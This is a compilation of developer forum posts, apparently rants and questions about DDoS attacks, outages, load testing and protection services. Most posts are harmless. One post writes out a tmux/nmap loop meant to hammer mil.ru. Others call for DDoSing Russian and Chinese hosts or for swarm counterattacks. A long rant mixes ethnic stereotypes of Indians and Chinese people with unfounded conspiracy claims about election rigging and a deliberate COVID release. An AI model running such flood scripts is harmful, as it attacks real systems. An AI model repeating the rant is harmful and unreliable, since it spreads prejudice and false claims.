I have probably the BEST DDOS DETECTION WORLDWIDE! It detects any DoS or DDoS at my private Network.

How it works?

Everytime I get attacked(so pretty often) my phone rings. But if I answer the phone there's only a "Beep Beep Beep". Shortly afterwards my connection shuts down 😂😂

I was experimenting with a load test suite called 'Siege' to build and scale increasingly complex searches against our new site search engine. I assumed that an old iMac couldn't have generated a crushing load against the beta servers and I learned two things the day I wrote and started that script before heading to lunch:

1) Beta and Production shared MSSQL instances
2) That single iMac was more than enough to take the whole production site down...

OK semi rant... Would like suggestions

Boss wants me to figure out someway to find the maximum load/users our servers/API/database can handle before it freezes or crashes **under normal usage**.

HOW THE FUCK AM I SUPPOSED TO DO THAT WITH 1 PC? The question seems to me to mean how big a DDoS can it handle?

I'm not sure if this is vague requirements, don't know what they're talking about, or they think I can shit gold... for nothing... or I'm missing something (I'm thinking how many concurrent requests and a single Neville melee even with 4 CPUs)

"Oh just doing up some cloud servers"

Uh well I'm a developer, I've never used Chef or Puppet and or cloud sucks, it's like a web GUI, not only do I have to create the instances manually and would have to upload the testing programs to each manually... And set up the envs needed to run it.

Docker you say? There's no Docker here... Prebuilt VM images? Not supported.

And it's due in 2 weeks...

Anybody else want to DDoS whole Russia and China Hosting Companys for there god damn dead Servers?

Always get a lot of spoofing and ssh login try's from there.

fail2ban FTW!

I AM IN RAGE !!! MY MANAGER IS A FUCKIN SNAKE ASSHOLE!

FUCKER RATED ME 3/5 !
i feel like destroying my laptop and putting my papers right away. this is absolute shit hole of a company where corporste bullshit and multi level hierarchy runs the system, ass licking is the norm and still me, a lowly sde dev 1 was giving my 200% covering their bullshit to deliver outputs on time.

let me tell you some stats.

- our app has grown by 2x installs and 5x mau.

- only 3 devs worked on the app. the other 2 can vouch for my competence.

- we were handled an app with ugliest possible code full of duplication, random bugs and sudden ANRs. we improved the app to a good level of working

- my manager/tl is such a crappy person that if asked about a feature out of random, he will reply "huh?" and will need 2 mins to tell anything about it.

- there is so much dependency with other teams and they want us to talk to them personally. like hell i care why backend is giving wrong responses. but i cared, i gpt so good handling all these shit that people would directly contact me instead of himal and i would contact them. all work was getting done coz 1 stupid fellow was spending 90% of his time in coordinations

- i don't even know how to work with incompetence. my focus is : to do my task, fix anything that is broken that will relate to my task in any way and gather all the stuff needed to complete my task

i am done. i cannot change this company because its name is good and i am already feeling guilty about switching my previous jobs in 1 year but this is painful.

in my first company i happily took a 10% hike coz i was out of college and still learning.
in my 2nd company, i left due to change in policies ( they went from wfh to wfo and they were in a different state) , but even while leaving they gave a nice 30% hike
in my current company idk wjat the no. 3 equates to , but its extremely frustrating knowing a QA who was so incompetent, he nearly costed us a DDOS got the same rating as me

------
PS : GIVE ME TIPS ON HOW TO BE INCOMPETENT WITHOUT GETTING CAUGHT

When the ddos kicks in

Quick question since I'm trying to prove a point here, is a DDOS attack hacking?

Dayumn github! 1.35 tbits per second ddos attack survived.

Ah yes, The Hacker News intentionally using intendation errors in python 2 to screw over people using their ddos script. yes. That's gotta be the reason

why the fuck am I even following these trolls

Legit questions!
How does facebook secures itself, we never heard news like facebook hacked, user data stolen, recently with ddos, twitter and other websites were affected but not Facebook?
Are they superhumans?

Developer: We have a problem.
Manager: Remember, there are no such things as problems, only opportunities.
Developer: Well then, we have a DDoS opportunity.

There's an angular project at work.

I guess they know about as much about angular as I do (not much)

Because the error page isn't working, so when you get an error, you infinite loop and DDoS yourself.

It actually crashes my (admittedly subpart) desktop.

Guess I'll be learning how to fix that.

And it happened again.
Steam DDOS-ed itself with the Summer-Sale.

I think this DDoS attack has made a few people re-evaluate their runtime dependencies

It wont go down, he said, it can't crash he said,
several DDoS later
You won your coffee and honor,
Touchè

It's been confirmed the DDoS attack on DYN that affected Github, Amazon, etc was perpetrated by supporters of Wikileaks for "revenge" for Julian Assange

My exploration into the dev world started back when Anonymous were actually something a bit more than just DDoS dicks. It started with joining in with the DDoSing, but that got me interested in how it works, how servers work, then how websites work, and it's all written from there!

Kinda amazing that dyn does not have DDoS protection...
It is NOT hard to get and for a quite big Company like dyn - it is cheap also

Setting up npm private registry and mirror is like setting up machine for handling ddos attack.

Last time I was tuning linux kernel tcp ip stack by adjusting default variable values was ages ago but if you see 100 open sockets in a matter of second after you try to install single frontend dependency you start questioning your life.

GitHub doesn't give a shit about DDoS attacks lol

Oh shit, I love DDoS attacks. FML...going to have nightmares after today

How to stop DDOS attack on AWS instance t2.medium :/ my weekend is down XD

DDoS and the company won't pay for scrubbers or CloudFlare protection :(

Best firewall indeed

So here's a random idea: DDoS defence swarm.

Install the daemon on your server, and every time your server gets DDoS'd, all members of the swarm will mobilise to defend you, but the catch is that your server will have to help other members of the swarm too.

The defensive technique in question can be one of many:

1. Automated IP blocking/reporting with a blacklist in distributed form.
2. Other swarm members counterattack and cooperatively DDoS the offending addresses.
3. Flood the ISP with automated emails to force them to pay attention to the problem.

...or a combination of all of the above.

The only issue I can see with this is abuse potential. A clever person can trick the swarm into DDoSing innocents.

Did Cloudflare just suffer the biggest DDoS attack?

At Rackspace there are lights on the walls that go off for things like ddos attacks, fire alarm, etc. The being a code rainbow. Meaning "evacuate the building".

Every time we deployed to prod I always joked one day that it would fail so spectacularly that it would cause a code rainbow.

Api spamming is another form of DDoS. Isn't it?

I once wrote an http interceptor for which was supposed to check the internal cache for user data and only do some work with it if they were (we manually controlled what and who was in cache). There were two methods on the service cGetUser and dGetUser I of course called d which it turned out loaded the user profile from the database which would be fine if it weren't done in an interceptor .. on a web service... With a little over 25000 requests per minute.. on each node..

Tldr. I accidentally wrote a database ddos tool into our app...

Client complains about DDOS but dont want cloudflare.

Installs Nginx. :Evilsmile:

The massive DDoS attack that took down the internet this morning, hit NPM too and I just cleared out my node modules without realizing it. :'(

!rant

Is there any alternative to socket.io that doesn't need to expose a server ip directly to any client, needing to set up a full nginx anti ddos/auth config and more?

There is the live-ajax way that requests progress, but it feels more like a hack each time. (especially if the site should be able to handle multiple tabs with different progress)

I thought maybe some framework has live requests inbuilt to update content from a server worker model. (without exposing the server ip)

Got a phishing email with a link to a website hosted by wix. The only thing on the site was a form and submit button so I’m sure it’s for collecting credentials. I was able to report them and wix shut it down which was nice. But I was thinking, if someone were to ddos the web server, what action would wix do? Would they let the requests keep coming and increase the customers bill? Or would they just shut down the server?

Men can DDos and women are born with firewall

When your cybersecurity departement gets back your hacked servers but then the whole network is DDoSed!

At the office
5 website is down !
Searching for answer ... Noting. Nginx is calm, php is calm, DB to many connections :O but the DB is interne acces only !!!

Internal ddos WTF

Drupal 8 website -> sorry guy i just fucked up and write 8Go of useless log in watchdog table because something went wrong

Actual log : %errormessage %errortime %vardump

Me : damm he fucked up and cannot write some complet log 🤣

Do you know some module to limit this table size and write acces ?

That moment in a ddos tutorial when the guy use cmd._.

Bruh its called fckn >D<dos xd

<3 Route53 DNS today.

TIL indians live on the "satisfaction" plane hence saying yes to things they can't do to satisfy you, but also dissatisfy people as a form of attritional warfare, which is their specialty.
I was watching the trump v Kamala debate and was reminded of a bunch of tactics I've had used against me by an Indian lead dev, who I ignored the behaviour of and didn't think she was actually hostile to me until it was too late. but it made me feel so bad for him and I got an epiphany. it seems like the tactics are the same, so I got curious if there was an Indian art of war

Interestingly the AI said yes but directed me to the wrong book. I did find the right book eventually. it exists. the Chinese stole ideas from it to write their sun tzu art of war, but it's basically a Machiavellian manual before Machiavelli was alive. very cool

also turns out China is behind everything. I remember ages ago I got in a fight with a schizoid programmer friend of mine because he knew China was taking over everything and he wanted them to win, and I was rooting for team India because they were far less miserable than the Chinese. don't make a deal with the Chinese. guy was stupid. they treat people like irrelevant meat

China seems to be connected to everything that's going on right now.
- they're infiltrating Canadian politics, get international students to change Canadian election outcomes (200k/30m people who weren't citizens but got bussed to voting centers and just used proof of address to vote. they changed outcomes of 4 elected officials in one province, and local Chinese people are saying they get threats about their family back in China if they don't do what China tells them to -- but our elected government just keeps quiet on it and then goes to China for new orders during "climate conferences" and uselessly gives them a bunch of our fucking money)
- there was issues with the Chinese buying up real estate in Canada and just leaving them empty. it's probably still happening even though Canada eventually imposed a tax on leaving empty real estate around that you're not renting out. they're still buying up properties, and we have an increasing housing shortage as a result. one of my old apartments a white guy, who was suspicious and shifty, bought the unit and forced us to move out citing code violations (you can't kick someone out otherwise here because of very strong renter's protections). they never introduced who bought the place, but they did have 7 ALL CHINESE SPEAKING IN CHINESE people come in and measure everything at the apartment. so they're definitely still buying up real estate
- are behind the green agenda (our politicians seem to take orders from them under this guise)
- seem to strangely have had camps where they let migrants pass through the South Americas to get into united states, were very closed off and hostile to anyone snooping so it was up in the air what they were doing there. after people came to snoop the camps up and disappeared
- are who USA is competing with in the AI race, the whole AI narrative is literally a fight between the west and China

and there's a super smart systems guy who thinks they were behind the world economic forum and I'm increasingly starting to believe it

all electronics coming from China should be a concern. it isn't

there's tons of Chinese trying to enter open source software to install backdoors. they're nearly successful or successful often. same with that DDoS on DNS years ago

there's rumours they've been running Canada since the 80s, via infiltrating Canadian tech companies to steal their software and are the gatekeepers for a lot of underground stuff

I'm starting to believe even the COVID virus was on purpose. I didn't before. there was a number of labs that had that virus, a lab leak happened around Ukraine 6 months prior to the "Olympics outbreak" (seriously that was PERFECT timing for a lab leak if you wanted to do a bioweapon on purpose -- you would hit every country at once!), but there was also a lab in Canada that had it and some reporters were upset about it because the lab didn't seem to care about our national security and was letting suspicious Chinese nationals work at it, and for some reason there's been discovered a BUNCH of illegal makeshift Chinese labs in California with super vile stuff in them

and what the fuck was that Chinese spy balloon fiasco anyway. you can't shoot it down? I think that was a test to see how fast and readily the west would defend itself. or maybe they wanted to see the response procedures

and then on top of it many people think the opioid epidemic is all china. china makes the drugs. it would also fit perfectly, because in the 1800s or whatever the British empire had entirely decimated china for decades by getting them addicted to the opioid trade. eventually the British empire merged with USA and now USA is basically the head of the new British empire

I think we're at war with China and literally don't fucking know it

tmux new -d -s 'fuck putin'
for i in 80 443; do tmux new-window -t 'fuck putin' -n $i "while :; do nmap mil.ru -p $i & done"; done
while :; do killall -9 nmap; sleep 2; done

Thoughts after a security conference.

The private sector, no matter the size, often plays a role (e.g. entry vector, DDoS load generating botnet, etc.) in massive, sometimes country-wide attacks. Shouldn't that make private businesses' CyberSec a matter of national security? Shouldn't the government create and enforce a security framework for private businesses to implement in their IT systems? IMO that'd also enforce standardised data security and force all the companies treat ITSec with at least minimal care (where "minimal" is set by the gov)

What are your thoughts?

So I was working on a web scraper to basically download all listings with detailed info from a e-shop to my database for some analysis.
And I completely forgot throttling which is quite important when writing such things in node.js.
It's funny how in other languages you try to figure out how to make your application faster and in node you're trying to make it slower 😄

Anyhow, I apparently hit the poor site with 5000+ simultaneous requests, all of which hit their database (to gather product info). Suffice to say, the site got visibly slow 🤣

Thankfully I print out where each request is made so I quickly realised my mistake and killed the process.

Now I hope no-one comes knocking on my door lol

The adventures of being a node.js dev

Last night the Russians stroke again. It's become obvious that these Ddos attacks are not performed by just some casual hackers, but are part of cyber warfare - just as I suspected in one of my rants a couple of weeks ago

Is there any package to install with apt to detect if the Server has no Internet connection and output maybe a netstat to a file if so?
My problem is: I have a Server and since today it randomly has no Internet for hours. I don't know if it's a DDoS or something different and I want to find out. I also can only SSH into it so it needs Internet to let me do anything.
(It's just a fun project so there is really only me who could do something)

rant && what do you think?

so one of our ISP (Orange Slovakia) had troubles with service for like two days. Their DNS servers translated domains to IPs reaaally slow or not at all. So when i saw the dns error in chrome (yes i use chrome and not quantum) I changed my dns to google dns and ignored it.

Two days later when the service was back up and running, this ISP went to the local media and made a statement "we had a DDOS attack, no user data were harmed, blabla" that was when my BS radar went bananas... so somebody DDOSd your DNS server ... for two fucking days straight... this is probably a lie or they have really noob engineers (or both).

I'm not an expert on network services or routing, or servers but, how about turning off this server, IP and setting up a backup on a different IP ? Possibly anyone here with experience how to handle DDOS? Whats the chance of this happening? i'm really curious

I need to test a client's website for DDoS attack performance, it has been attacked in the past and I want to know what kind of changes are the most effective, are there any good tools/services you know?

Just out of curiosity...
Is there a way to prevent a DDoS attack using settings in the Router? Like, changing the DNS Port to maybe 54 because most people just spam 53 with random packets?

All banks in India continue to fail to handle such huge rush of customers.

They should have had a better load balancer, and some ddos protection.

What do you use for your side-projects regarding Anti-DDoS protection?

I have a community with 1-2k daily users hosted in Siteground. Currently, I am not experiencing any DDoS issues (mainly L4) but I used to when I was using another service provider. The trade-off is that the machine and the service I'm paying here is way more expensive.

I don't care about managing the server, but I was looking for a cheaper option to get my project with.

The stack is LAMP and it is an Invision Power Board forum.

What do you recommend? Which service(s) do you use for your projects and how do you prevent DDoS on your side?

Just wasted whole day with plesk webhosting :D

Decided to move to a DDOS protected hosting by OVH.com

Chose plesk web hosting

Turns out in order to park domain to plesk webhosting it's necessary to change GLUE records and nameservers to point to plesk VPS IP

My domain registrar where I have 10+ domains does not allow changing GLUE records. Only way to make it work would be to move all domains to new registrar and pay for each domain as it's a new one.

FML just wasted 16 euros on this useless plesk webhosting. Need to take regular webhosting :D

So it has been a couple of months since I've used MailGun in a project and I felt like it was time to use it. So I try to go to the mailgun website and it doesn't seem to load. I check twitter and they are experiencing a DDoS attack (tweeted out 20 minutes ago)

Really? Did it really have to happen now I just wanted to use it :c?

I was in my class on Thursday around 12 PM noon Indian standard time.
I couldn't access github on mobile (connection refused error) but at 2 pm once I was out of class could access it.
Any guesses if it was related to recent ddos attack on dyn ?
Location: India

I have a windows vps with a server that I want to protect from DDoS and hide from outside world. Is there a way by using PHP IIS webserver on another vps to somehow whitelist ips or redirect only clean traffic to my windows vps?

Good tools for testing ddos protection or just make a script and call it a day?

WOW -__- they left me to code the SPO Teams website when im coding a Text rpg engine while Over clocked is fixing his tablet while Solario is helping his other friends code his java + lua = andlua mod menus for android Screw ya )=<
@overclockedgd
@Solario360
im not even good at website designs LOL its gonna be a website that wants to commit DDoS iill post the final product and if you survive through the whole website without getting your computer molested props to you =)

Looking for a ddos protected webhosting in Europe. Can you recommend something? Was looking at ovh.com but they require you to pay for whole year and I'm not ready to throw ~160EUR and hope for the best.

I spent whole day for one client in order to implement ddos protected tunnel into his java based project. In exchange he was supposed to send me his source code of one of his projects. Fucker didnt send me anything. Good that while doing migrations for him I downloaded his compiled project backup, so all I had to do was decompile his jars which had no obfuscafion whatsoever, so I managed to salvage around 95 percent of his source code. Checkmate boi.

Whoa.. I think piratebay is under DDoS attack. I was trying to get microprocessor tutorials. Can anyone verify?

Anyone else has the same issue with XHR on Firefox, where it sends shitload of requests and then does something?

Testing the same code on Chromium stuff works just fine, only one request and calls another method. Firefox does free DDOS

Another disaster of 2020 had struck.
The internet is fucked again. This time of a global scale. Did you grow a bit suspicious why everything takes more to load? USA is getting ddosed by china again... I get dns proube failed error on every website and things that work are as fast as that inter your company have hired for thag cobol project from 1876. I have a online test tomorrow, usa can you fucking get ddosed later?

Yep and the attack is currently shown on the famous ddos graph web site

Our government's "information and technology institution" ran a ctf yesterday. Their website was a whole template. And like 1 hour before ctf website approximately got 400-500k request and they've hit by a ddos. During the competition individual competitors couldn't log in their accounts due to "wrong password" and also password reset mails not sent.

One of the rules of the competition was that the questions were not leaked out during the contest. But some groups and individuals wanted help for questions on some hack forums. CTF is over and seems like script kiddies gonna win.

Shitstorm.

Sooo, this DDoS I read about, it's hitting quite a few mayor sites isn't it? From what I've noticed at least Twitter, GitHub, Dyn. Any other mayor ones?

How exactly can you protect your website from sql injections and ddos? The website used php and a mysql database.

Does someone have an idea how to use synproxy and nat (dnat and snat) together on one machine? It's basically a router which should also act as a ddos filter, but when I install synproxy, the natting doesn't work anymore...
I can't really find something on the internet so help would be appreciated.

Thanks in advance

Need advice about protecting ddos via iptables and whitelisting. Currently I launched my gameserver and am fighting against a massive attack of botnets. Problem was solved by closing all ports on my gameserver linux machine and shipping game.exe with injected c++ socket client. So basically only gamers who launch my game exe are being added to firewall iptables via the socket client that is provided in the game exe. If some ddosers still manage to get inside and ddos then my protection is good enough to handle attacks from whitelisted ips from inside. Now I have another problem. Lots of players have problems and for some reason shipped c++ client fails to connect to my socketserver. Currently my solution was to provide support in all contact channels (facebook,skype,email) and add those peoples ips to whitelist manually. My best solution would be to make a button in website which you can click and your ip is whitelisted auromatically. However if it will be so easy then botnets can whitelist themselves as well. Can you advice me how I could handle whitelisting my players through web or some other exe in a way that it cant be replicated by botnets?